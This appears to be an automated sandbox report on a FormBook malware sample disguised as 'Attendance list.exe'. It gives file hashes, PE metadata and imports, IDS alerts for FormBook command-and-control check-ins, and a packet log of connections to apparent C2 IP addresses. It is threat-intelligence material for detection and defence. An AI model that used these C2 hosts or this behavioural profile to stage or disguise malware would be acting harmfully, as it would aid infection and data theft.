                      Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                      • 93.188.3.13
                      D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                      • 194.9.94.85
                      file.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                      • 93.188.3.11
                      No context
                      No context
                      Process:C:\Windows\SysWOW64\clip.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Reputation:high, very likely benign file
                      Process:C:\Users\user\Desktop\Attendance list.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):270848
                      Entropy (8bit):7.994162077855672
                      Encrypted:true
                      SSDEEP:6144:/g2NQUrgeNCOMb4UHwJewxix9RcqOsUSTQEs7OoAGD:/vBNr7UQJbxiiqxsKDa
                      MD5:39EC39B1818CDB59822D3D0A2E49177F
                      SHA1:24714A4B114C601DE4871159A7237DDD7B015790
                      SHA-256:D2F5EF08E29A0F4A6058E54A5725182E0525E7B7E6C20477C4665DCEEFB7AFED
                      SHA-512:7A26EA5D9B3CB6B47AC5E689161C4A33D85D13B6F9866A2568887C4B804053C59F465C09EC564F1A5C3805F2D9BE647316E1F05C117EC49575DFC0ACAD28090D
                      Malicious:false
                      Reputation:low
                      Process:C:\Users\user\Desktop\Attendance list.exe
                      File Type:ASCII text, with very long lines (28756), with no line terminators
                      Category:dropped
                      Size (bytes):28756
                      Entropy (8bit):3.5862559753336423
                      Encrypted:false
                      SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbX+IZ6Gg4vfF3if6gyHs:miTZ+2QoioGRk6ZklputwjpjBkCiw2Ru
                      MD5:042C77DB25CE7978F76E0218114AE8BF
                      SHA1:E1107C7B56E1547B9AFB50C07F02813A06E37551
                      SHA-256:296D97C0711B95BAD3DF9567BFED2585F712DAACEB8A67B7600C5F2A120C87DA
                      SHA-512:B68F3E9557FB4728F77124232C1C41AA11C7FFB0317BE4DC57EC273A1768ABB95E690FA0415D00F464BD0A913C6D8046C6AF62007EA620ADE091AD2289AEFF3F
                      Malicious:false
                      Reputation:low
                      Process:C:\Users\user\Desktop\Attendance list.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):270848
                      Entropy (8bit):7.994162077855672
                      Encrypted:true
                      SSDEEP:6144:/g2NQUrgeNCOMb4UHwJewxix9RcqOsUSTQEs7OoAGD:/vBNr7UQJbxiiqxsKDa
                      MD5:39EC39B1818CDB59822D3D0A2E49177F
                      SHA1:24714A4B114C601DE4871159A7237DDD7B015790
                      SHA-256:D2F5EF08E29A0F4A6058E54A5725182E0525E7B7E6C20477C4665DCEEFB7AFED
                      SHA-512:7A26EA5D9B3CB6B47AC5E689161C4A33D85D13B6F9866A2568887C4B804053C59F465C09EC564F1A5C3805F2D9BE647316E1F05C117EC49575DFC0ACAD28090D
                      Malicious:false
                      Reputation:low
                      Process:C:\Users\user\Desktop\Attendance list.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):9814
                      Entropy (8bit):7.602618158290456
                      Encrypted:false
                      SSDEEP:192:65jwEiq+uHKrLM0IltC6jQqSa6fYHToxycOIyYpgijSWzKrBSi/1aF:I6q+Brw/gjYKycW0gUMB//1I
                      MD5:2F712A00DD6B064B388C34F844EA7A0E
                      SHA1:35F3D0265D2A5FEA5F2C82A076716B9CA1B4B98D
                      SHA-256:7301D5D56B9A93F1EDBD5E4140221EA2F2B25CB7A56EA07EDCCB425D5C896326
                      SHA-512:A7DD30866507F4FCA0F2F6EAEEFE67E6866978CB19523CD9B36FCBCA1BD7C0AAB3820EAC80F7EAC8998D7F0E72126784D48B5A51FD2288238DA8DF2896E7D1F4
                      Malicious:false
                      Reputation:low
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.145716661459288
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:Attendance list.exe
                      File size:1'193'472 bytes
                      MD5:8a08778411f99d8db7790cb7f0a84e3b
                      SHA1:374833b2a846feb5c015f0ffcf44320a62ffa697
                      SHA256:fd8e19c88440f8e813686b5b91c2df082c0d319af7ff6a10056e27c5400228fe
                      SHA512:1f0a8c3e3ec10b4f00a1a84493e75fdcde0f625577f8022e6f3045096e956407d282a6438e4f9a40519041a094384124866b4b9e23cf379d7a910a258f10a9f5
                      SSDEEP:24576:lAHnh+eWsN3skA4RV1Hom2KXMmHawY3axThttc5:Uh+ZkldoPK8YawA8Tht8
                      TLSH:BD45AD0273D1C036FFABA2739B6AF60556BC78654123852F13981DB9BD701B2263E763
                      Icon Hash:aaf3e3e3938382a0
                      Entrypoint:0x42800a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6683370B [Mon Jul 1 23:08:59 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                      Instruction
                      call 00007F3574D5E30Dh
                      jmp 00007F3574D510C4h
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      push edi
                      push esi
                      mov esi, dword ptr [esp+10h]
                      mov ecx, dword ptr [esp+14h]
                      mov edi, dword ptr [esp+0Ch]
                      mov eax, ecx
                      mov edx, ecx
                      add eax, esi
                      cmp edi, esi
                      jbe 00007F3574D5124Ah
                      cmp edi, eax
                      jc 00007F3574D515AEh
                      bt dword ptr [004C41FCh], 01h
                      jnc 00007F3574D51249h
                      rep movsb
                      jmp 00007F3574D5155Ch
                      cmp ecx, 00000080h
                      jc 00007F3574D51414h
                      mov eax, edi
                      xor eax, esi
                      test eax, 0000000Fh
                      jne 00007F3574D51250h
                      bt dword ptr [004BF324h], 01h
                      jc 00007F3574D51720h
                      bt dword ptr [004C41FCh], 00000000h
                      jnc 00007F3574D513EDh
                      test edi, 00000003h
                      jne 00007F3574D513FEh
                      test esi, 00000003h
                      jne 00007F3574D513DDh
                      bt edi, 02h
                      jnc 00007F3574D5124Fh
                      mov eax, dword ptr [esi]
                      sub ecx, 04h
                      lea esi, dword ptr [esi+04h]
                      mov dword ptr [edi], eax
                      lea edi, dword ptr [edi+04h]
                      bt edi, 03h
                      jnc 00007F3574D51253h
                      movq xmm1, qword ptr [esi]
                      sub ecx, 08h
                      lea esi, dword ptr [esi+08h]
                      movq qword ptr [edi], xmm1
                      lea edi, dword ptr [edi+08h]
                      test esi, 00000007h
                      je 00007F3574D512A5h
                      bt esi, 03h
                      Programming Language:
                      • [ASM] VS2013 build 21005
                      • [ C ] VS2013 build 21005
                      • [C++] VS2013 build 21005
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [ASM] VS2013 UPD5 build 40629
                      • [RES] VS2013 build 21005
                      • [LNK] VS2013 UPD5 build 40629
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x58f9c | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x121000 | 0x7134 | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0xc8000 | 0x58f9c | 0x59000 | 6e5a53c1a6bd27e7b795f4181821075d | False | 0.9265438465589888 | data | 7.890603905752855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc | 0x121000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                      RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                      RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                      RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                      RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                      RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                      RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                      RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                      RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                      RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                      RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                      RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
                      RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                      RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                      RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                      RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                      RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                      RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                      RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                      RT_RCDATA | 0xd07b8 | 0x50264 | data | | | 1.0003381136305485
                      RT_GROUP_ICON | 0x120a1c | 0x76 | data | English | Great Britain | 0.6610169491525424
                      RT_GROUP_ICON | 0x120a94 | 0x14 | data | English | Great Britain | 1.25
                      RT_GROUP_ICON | 0x120aa8 | 0x14 | data | English | Great Britain | 1.15
                      RT_GROUP_ICON | 0x120abc | 0x14 | data | English | Great Britain | 1.25
                      RT_VERSION | 0x120ad0 | 0xdc | data | English | Great Britain | 0.6181818181818182
                      RT_MANIFEST | 0x120bac | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                      DLL | Import
                      WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                      VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                      WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                      COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                      MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                      WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                      PSAPI.DLL | GetProcessMemoryInfo
                      IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                      USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                      UxTheme.dll | IsThemeActive
                      KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, 
EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                      Language of compilation system | Country where language is spoken
                      English | Great Britain
                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                      07/02/24-07:16:54.138571 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49730 | 80 | 192.168.2.5 | 194.9.94.85
                      07/02/24-07:17:39.655226 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.5 | 199.192.19.19
                      07/02/24-07:18:22.648730 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49750 | 80 | 192.168.2.5 | 194.58.112.174
                      07/02/24-07:17:53.138400 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49741 | 80 | 192.168.2.5 | 213.145.228.16
                      07/02/24-07:15:37.719521 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49712 | 80 | 192.168.2.5 | 217.160.0.106
                      07/02/24-07:16:40.545082 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49726 | 80 | 192.168.2.5 | 43.252.167.188
                      07/02/24-07:17:05.560896 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49733 | 80 | 192.168.2.5 | 23.251.54.212
                      07/02/24-07:15:40.247293 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49713 | 80 | 192.168.2.5 | 217.160.0.106
                      07/02/24-07:16:15.340972 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49722 | 80 | 192.168.2.5 | 208.91.197.27
                      07/02/24-07:17:42.185389 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49738 | 80 | 192.168.2.5 | 199.192.19.19
                      07/02/24-07:16:51.569315 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49729 | 80 | 192.168.2.5 | 194.9.94.85
                      07/02/24-07:18:06.490979 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49745 | 80 | 192.168.2.5 | 91.195.240.19
                      07/02/24-07:18:36.061329 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49754 | 80 | 192.168.2.5 | 172.67.210.102
                      07/02/24-07:15:53.606736 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49718 | 80 | 192.168.2.5 | 142.250.181.243
                      07/02/24-07:16:12.803259 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49721 | 80 | 192.168.2.5 | 208.91.197.27
                      07/02/24-07:16:38.017253 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49725 | 80 | 192.168.2.5 | 43.252.167.188
                      07/02/24-07:17:55.674478 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49742 | 80 | 192.168.2.5 | 213.145.228.16
                      07/02/24-07:18:09.029321 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49746 | 80 | 192.168.2.5 | 91.195.240.19
                      07/02/24-07:18:33.529295 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49753 | 80 | 192.168.2.5 | 172.67.210.102
                      07/02/24-07:18:19.901548 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49749 | 80 | 192.168.2.5 | 194.58.112.174
                      07/02/24-07:17:08.093244 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49734 | 80 | 192.168.2.5 | 23.251.54.212
                      07/02/24-07:15:51.064470 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49717 | 80 | 192.168.2.5 | 142.250.181.243
                      Jul 2, 2024 07:17:26.945303917 CEST804973323.251.54.212192.168.2.5
                      Jul 2, 2024 07:17:26.945363998 CEST4973380192.168.2.523.251.54.212
                      Jul 2, 2024 07:17:29.485029936 CEST804973423.251.54.212192.168.2.5
                      Jul 2, 2024 07:17:29.485208988 CEST4973480192.168.2.523.251.54.212
                      Jul 2, 2024 07:17:32.032141924 CEST804973523.251.54.212192.168.2.5
                      Jul 2, 2024 07:17:32.039213896 CEST4973580192.168.2.523.251.54.212
                      Jul 2, 2024 07:17:34.580622911 CEST804973623.251.54.212192.168.2.5
                      Jul 2, 2024 07:17:34.580717087 CEST4973680192.168.2.523.251.54.212
                      Jul 2, 2024 07:17:34.581742048 CEST4973680192.168.2.523.251.54.212
                      Jul 2, 2024 07:17:34.590667963 CEST804973623.251.54.212192.168.2.5
                      Jul 2, 2024 07:17:39.639225960 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:39.650464058 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:39.650628090 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:39.655225992 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:39.659962893 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.264354944 CEST8049737199.192.19.19192.168.2.5
